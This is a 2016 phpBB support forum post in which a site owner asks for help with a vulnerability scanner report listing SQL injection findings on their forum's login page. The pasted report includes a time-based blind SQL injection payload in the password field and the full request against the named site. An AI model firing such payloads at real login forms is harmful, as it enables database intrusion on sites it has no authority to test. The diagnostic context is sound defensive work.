Website security audit

Get help with installation and running phpBB 3.1.x here. Please do not post bug reports, feature requests, or extension related questions here.
Ideas Centre
Forum rules
READ: phpBB.com Board-Wide Rules and Regulations

NOTE: phpBB 3.1.x is at its End of Life stage and support will NOT be provided after July 1st, 2018.
Locked
User avatar
cpapaioannou
Registered User
Posts: 69
Joined: Fri Jul 25, 2014 10:18 pm

Website security audit

Post by cpapaioannou » Sun Oct 30, 2016 4:55 am

Hello all,

I am having problems with a security audit on my site (https://wssa.beyondsecurity.com) regarding Vulnerabilities in Custom Web Code.

The errors are in relation to the following (the 39 failures)

Blind SQL Injection 784 39 745
SQL Injection 952 39 913

One of the errors in more detail -
2. Vulnerabilities in Custom Web Code (High)
back
Port: http (80/tcp)
Summary:
We discovered vulnerabilities in the scripts listed below. Next to each script, there is a description of the type of attack that is possible, and the way to recreate the attack. If the attack is a simple HTTP GET request, you can usually paste it into your browser to see how it works. If it's a POST attack, the parameters for the POST request will be listed in square parenthesis.

Blind SQL Injection
URL: http://www.princessplace.ca/ucp.php?mode=login
Affected Parameter: password
Vector Used: VALUE';WAITFOR DELAY '00:00:24';--
Pattern found: Timing test
Complete Attack: http://www.princessplace.ca/ucp.php?mode=login [username= &password=';WAITFOR DELAY '00:00:24';-- &login=Login &redirect=./index.php?]

I have obtained a certificate for the site (https) but I am not sure what exactly these are referring to. I will note that when I was hosting the site on my internal NAS, I was not getting these errors, but on the hosting company, they started to come up. Hosting company doesn't seem to know what they are and they directed me to get the https setup with the thought that it would correct the errors.

I hope someone can help clear this up.

C

Locked

Return to “[3.1.x] Support Forum”